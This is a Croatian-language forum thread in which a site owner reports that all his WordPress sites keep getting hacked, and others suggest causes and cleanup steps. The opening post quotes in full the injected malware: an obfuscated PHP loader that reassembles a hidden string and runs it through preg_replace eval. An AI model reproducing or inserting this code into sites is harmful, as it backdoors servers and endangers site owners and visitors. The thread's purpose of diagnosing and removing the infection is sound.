WordPress Hakovan!

m1l4n · kolovoz 2014 18:24 30

Neko mi konstanto provaljuje u wordpress stranice i dodaje kod:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $grlwtrkjxr = ']y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:5):fmji%x5c%x7878:<##:>:U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)4-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x578e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258M*<%x22%51%x29%51%x29%73", NULL); }&w6<%x5c%x787fw6*CW&)7g]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x5c%x7825,3,j%x5c%x7825>j%x5c%x7)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860oX&Z&S{ftmfV%x5c%x787f<*if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!iz>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%!*#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825#372]58y]472]37y]672]48y]#3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%xx785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2~!Ydrr)%x5c%x7825r%x5c%x7878Bsfux61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%15T-%x5c%x7825hW~%x5c%x7825fdy)x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN#>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x786043%x7825bbT-%x5c%x7825b5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!%x5c%x7824b!>!%x5c%x1);} @error_reporting(0); preg_replace("x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5cx5c%x7825j^%x5c%x7824-%x5c%x7c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]24#)zbssb!>!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x75c%x7825w%x5c%x7860TW~%x5c%x7824<%x5]y84]275]y83]248]y83]256]y81]265]y72]254]y76#<7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f#00gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%%x5c%x7824%x5c%x785c%pf{jt)!gj!<*2bd%x5c%x7825-#1GO%x824-%x5c%x7824-!%x5c%x7825%x5c%x78t!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsv7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%x7825>U<#16,47R%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<25tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bx5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%445]212]445]43]321]464]284]364]6]234]342]58]24]31#-7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6%x5c%x7825tmw!>!#]y84]275]82]y76]62]y3:]84#-!OVMc%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x782%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x>s%x5c%x7825<#462]47y]252]18y]#>q4%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x21%50x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%xopjudovg}k~~9{d%x5c%x78255)ftpmdR6<*id%x5c%x7825)dfy825z!>2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x%x785cq%x5c%x78257%x5c%r%x5c%x785c2^-%x5c%x7825hOh%x59275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x782o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%7825j:=tj{fpg)%x5c%x7825s:*5c%x7825)7fmji%x5c%x787fvr#%x5c%x785cq%x5c%x788b%x5c%x7825w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860%x5c%x7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c824tvctus)%x5c%x7825%x5c%x7824-;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)86<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]]y74]256#<!%x5c%x7825ff2!>!bssbz)%x5c%x7824]25%x5c%x7fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<x7860ufh%x5c%x7860fmjg}[;lj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fm]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld#p#%x5c%x782f%x5c%x7825z<jg!)%x5c%x7825z>%x782fr%x5c%x7825%x5c%x7c%x782f#00#W~!%x5c%x7825PT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c7gj6<**2qj%x5c%x7825)hopm%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Du%x5c%x7825!-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]27**111127-K)ebfsX%x5c%x7827u%xuyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%]y6g]273]y76]271]y7d]252]y74]256#<!97g:74985-rr.93e:5597f-s.973:8297f:5297e:56-%x5c;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%x7827,*d%x5c%x7827,*c>!%x5c%x782400~:<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%c%x782272qj%x5c%x7825)c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y850ftsbqA7>q%x5c%x78256<%x5c%x7876]36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~t2w)##Qtjw)#]82#-#!#-%x5c%x787824-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827iddpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-id%x5mt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)idubn%7825yy)#}#-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%xsutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5sset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%156%x7.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5cc%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5)sfebfI{*w%x5c%x7825)kV%x5c%x7877860gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x782#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuopD#c%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c82fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x525)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x5c%pg)%x5c%x7825%x5c%x782fs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x7c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!%x5c%x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:<#opo#>b%x5c%x7825!*#<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x786c%x7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{f%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x78255c%x782f#%x5c%x782f},;#-#}+;%x5c%c%x7825)uqpuft%x5c%x7860msvd},;<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5c%x7827pd%x5%x787fw6*3qj%x5c%x78257>%x5XAZASV<*w%x5c%x7825)ppde>u%x5c%xx7825-qp%x5c%x7825)54l}uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x782j<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x7%x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860x7878:-!%x5c%x7825tzw%x5c%x782f%x5#]341]88M4P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373Px782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c%x7827jsv%x252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#77]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]6-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpusut)tpqs5%156%x61"]=1; function fjfgg($n)M7]K3#<%x5c%x7825yy>#0un>qp%x5c%x7825!|Z~!<##!>!]y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x55c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zs86]y31]278]y3f]51L3]84]y31M68257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860M24-%x5c%x7824*!|!%x5c%x7824-x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*ss-%x5c%x7825r%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:612p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusuc%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce47825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5cc%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gc%x7824<!%x5c%x7825mm!>!#]y81]273]y76]2151%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5c%x7825fR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSx5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827r57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%x75)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-42%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7825eN+#Qi%x5c%x785c1^W%58]y6g]273]y76]271]y7d]252!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c22l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5cx7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x7865c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!g%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[kvodujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x55}&;ftmbg}%x5c%x787f;!osvufs}w;*%x825!<**3-j%x5c%x7825-bubE{h%%x7878r.985:52985-t.98]K4]65]D8]x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W{return chr(ord($n)-)3of>2bd%x5c%x7825!<5h%x5c%xhA%x5c%x7827pd%x5c%x78256<pd%x5c%x782825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x5w6Z6<.4%x5c%x7860hA%x5*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5%x7827;mnui}&;zepc}A;~!}%x5c%x787fSFTV%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!8{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%x78f#<%x5c%x7825tdz>#L4]275L3pjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5jgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x78604-%x5c%x7824*<!~!dsfbuf%x5c%x-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c56]y6g]257]y86]267]y74]272986+7**^%x5c%x782f%x5c%x~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x785c%x7822#)fepmqyfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhAvso!sboepn)%x5c%x7825epnbss-5]y7:]268]y7f#<!%x5c%x7825tww!25)ufttj%x5c%x7822)gj6<^#Y#%x5cx5c%x7825c!>!%x5c%x7825i%x5c%x7874]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x/(.*)/epreg_replacewkhhbcbzhh'; $cgjyeqmjki = explode(chr((295-251)),'457,62,5343,65,7232,33,9018,20,1334,40,8677,49,7939,60,883,68,2595,57,8216,67,3369,67,9066,37,9152,23,7358,55,4727,37,6378,55,5622,51,6700,46,1733,45,4244,30,3323,23,3579,55,3243,53,8110,45,5811,58,7489,47,3992,68,6433,27,4536,22,4060,25,660,68,9604,31,3001,23,6894,64,7413,48,3346,23,9862,31,6145,53,4826,31,3687,42,294,23,3755,45,9439,70,3176,67,2850,27,8041,69,5053,48,1052,67,8726,65,8353,54,3729,26,5101,40,5141,54,6347,31,6515,58,8836,34,1271,43,4908,62,9685,55,5739,50,2652,65,4639,46,8458,69,6100,45,354,33,8870,28,8930,42,8283,70,7077,60,564,70,387,47,9377,62,7832,68,1868,32,9740,64,9038,28,1673,60,4403,63,1778,69,8571,48,7286,27,7680,50,1934,68,5195,51,7168,64,5309,34,7730,50,1521,70,6746,51,9264,45,6062,38,6041,21,1014,38,2185,66,7564,50,4274,46,728,68,6314,33,6492,23,5932,62,2825,25,1184,66,3054,70,6637,63,9103,49,8619,58,6573,64,4685,42,434,23,6460,32,2002,60,8155,61,5582,40,5500,32,9309,42,8527,44,9230,34,3531,48,71,59,4136,67,1119,65,7313,45,6958,55,1627,46,2419,25,796,55,9635,25,9832,30,4466,70,1374,69,3944,24,5673,66,2467,43,47,24,2104,40,634,26,2562,33,3124,52,9175,55,5455,45,7900,39,8432,26,3634,53,1900,34,7536,28,1847,21,1443,29,3500,31,1314,20,5246,63,2302,60,2759,66,4999,54,8791,45,6198,65,5789,22,9509,29,5532,50,174,40,1472,49,9925,69,4558,38,8407,25,9893,32,8972,46,851,32,9804,28,6263,51,519,45,980,34,7999,42,3024,30,3968,24,4970,29,2144,41,7614,66,4355,48,8898,32,7461,28,0,47,2362,57,7265,21,317,37,4085,51,9351,26,3841,62,3800,41,3436,64,1250,21,951,29,130,44,6831,63,4857,51,2251,51,10052,54,2717,42,9660,25,7780,52,2510,52,3296,27,9994,58,5994,47,5408,47,2062,42,7137,31,2877,69,3903,41,2946,55,1591,36,4596,43,6797,34,5869,63,9538,66,214,45,4320,35,4203,41,7013,64,4764,62,2444,23,259,35'); $iykxaeygtl=substr($grlwtrkjxr,(48119-38013),(49-42)); if (!function_exists('tgnjyqryhj')) { function tgnjyqryhj($wxwsvuhsrj, $zjmygrylzc) { $hmefrgrwde = NULL; for($yctigknxqa=0;$yctigknxqa<(sizeof($wxwsvuhsrj)/2);$yctigknxqa++) { $hmefrgrwde .= substr($zjmygrylzc, $wxwsvuhsrj[($yctigknxqa*2)],$wxwsvuhsrj[($yctigknxqa*2)+1]); } return $hmefrgrwde; };} $jbubwwpoxz="\x20\57\x2a\40\x63\154\x65\170\x7a\143\x66\152\x6b\157\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\61\x38\55\x38\61\x29\51\x2c\40\x63\150\x72\50\x28\65\x37\62\x2d\64\x38\60\x29\51\x2c\40\x74\147\x6e\152\x79\161\x72\171\x68\152\x28\44\x63\147\x6a\171\x65\161\x6d\152\x6b\151\x2c\44\x67\162\x6c\167\x74\162\x6b\152\x78\162\x29\51\x29\73\x20\57\x2a\40\x75\156\x72\146\x78\171\x68\172\x6e\155\x20\52\x2f\40"; $ekruulbdab=substr($grlwtrkjxr,(44951-34838),(38-26)); $ekruulbdab($iykxaeygtl, $jbubwwpoxz, NULL); $ekruulbdab=$jbubwwpoxz; $ekruulbdab=(615-494); $grlwtrkjxr=$ekruulbdab-1; ?>

Da li je neko imao slicnih problema, ocistim sve i promjenim login podatke ali nakon desetak dana opet isto. I to ne na jednom WP sajtu nego na svim. Hosting je WebHostingFace.

21x · kolovoz 2014 19:11 30

Šta imaš sve od plugina? Ako je tek instaliran WP, kontaktiraj podršku i objasni im, bilo wordpress bilo hosting podršku. Ali 90% da je preko plugina nekog, možda i teme ako koristiš neku nulled verziju.

Jolla · kolovoz 2014 20:28 30

Promjeni podatke za server, nakon toga sve wp podatke. Napravi backup wp-content i očisti od virusa. backup baze. Izbriši sve sa servera. Čista wp instalacija, ubaciš wp-content i bazu.

Tak sam se ja riješio, vrag ti je to

imemperor1 · kolovoz 2014 21:45 30

Ja sam primetio npr da su mi na jedan hosting konstantno upadali sta god uradio. Dok na druge nisu nikada. Tako da vrlo moguce da je do nesigurnosti samog hostinga.

osamabinmladen · kolovoz 2014 22:37 30

Kod mene se povremeno umjesto stranice ili posta otvori uvijek isti YouTube video Kontaktirao sam hosting support (Avalon) i oni su kao nešto čistili međutim sve se i dalje ponavlja.

drmrgood · kolovoz 2014 09:09 31

Najvjerojatnije i je do teme ako je nulled. Medjutim, ne mora biti. Meni je recimo na jednoj stranici netko stalno objavljivao nove postove. Stavljao sam sve moguce wp security pluginove, ali na neku foru taj “netko” je stalno uspio upadati unutra i uvijek je iznova znao admin username i pass za WP. Dok na kraju nisam otkrio da je moj PC bio zarazen i da sam imao takvu vrstu malwarea koja je to citala usernae i pass sa mog PC-a i slala ga nekom. Malware bi snimio username i pass, taj “netko” bi se logirao i napisao post.

c3po · kolovoz 2014 11:20 31

Najčešče to i jeste posao za “Malwarebytes Anti-Malware”. On to sređuje brzo i sigurno.

Ili to, ili ga čekati jednu večer u zasjedi na serveru, iza kantuna…

m1l4n · kolovoz 2014 17:14 31

Malwarebytes Anti-Malware mi našao čak 6 Malwar-a na PC-u, a imam plaćen Avast izgleda da slabo radi (iako mislim da je Anti-Malware jači od Avasta po pitanu Malware fajlova).

Očistiću WP, pa ću vidjeti šta će biti, ako se bude dešavalo opet onda je vjerovatno do hosta.

mestro67 · kolovoz 2014 17:31 31

Nedavno sam jednom članu s foruma čistio WP upravo zbog problema navedenog u prvom postu.

Potrebno je skenirati sve datoteke kako bi se izbrisala funkcija koja dodaje navedeni kod.
Također treba vidjeti da nema što skriveno u DB.
Nakon toga očistiti računalo i promijeniti sve lozinke.
Te dodati plugine za zaštitu same stranice.

c3po · kolovoz 2014 17:32 31

Ovo je istina. Treba uvijek svaku malo, ili kad primijetiš da škripi; proći sa ovim Anti-Malware.

m1l4n · kolovoz 2014 17:34 31

Znaš li otprilike gdje bi se funkcija mogla nalaziti i kako izgleda, a doduše zamjeniću sve fajlove i samo temu prečistiti, jer ostalo ništa nisam mjenjao, jedino me zeza kako bazu pročistiti ali naću način

mestro67 · kolovoz 2014 17:42 31

Postoji program koji se zove TextCrawler, s njima u bulku možeš pregledati sve datoteke od jednom za traženi pojam.

Znači skineš kompletan back-up na desktop i s tim programom tražiš KW koji bi mogao biti sumnjiv.

dado023 · rujan 2014 17:57 1

wordpress, joomla, drupal…svejedno, u svakom CMS-u postoji neka rupa koja se kasnije otkrije…
Inače koristim SUCURI za inspekciju webstranice koju trebam čistiti, a ako ne pomaže, sve zipiram u cPanelu i skinem na komp, zatim skeniram AV programom.

Za prvu ruku pokušaj sa Sucuri

drmrgood · rujan 2014 21:02 1

SUCURI je ok, ali u nekim slucajevima ne pomaze. Pa tako recimo ako u WP footeru imas maliciozni kod u base64, to SUCURI nece otkrit i mozes ga nac jedino “pjeske”. I druga metoda je ok, ali opet ne otkriva sve, jer ne mora na stranici bit virus, kao sto rekoh, maliciozni kod moze biti upakiran u bilo koji file a to antivirus nema sanse da otkrije.

serverhr · rujan 2014 09:54 2

Imali smo par klijenata s istim problemom. Probaj si skinut multifind i plugins folder na komp. Nakon toga provjeri cijeli plugins folder u potrazi za “spamcheckr” gdje ti locira navedeni kod taj plugin ti je zarazen.

osamabinmladen · rujan 2014 18:39 2

Hvala puno na konkretnom savjetu i na spremnosti pomoći. Tako se stvara povjerenje kod korisnika, dovode novi i zadržavaju postojeći. Respekt!

m1l4n · rujan 2014 14:35 3

Ne pravi mi skripta redirekt na taj video. Ovo je izgleda drugi tip problema, prebacicu sve na racunar i pregledati pa cu vidjeti u cemu je problem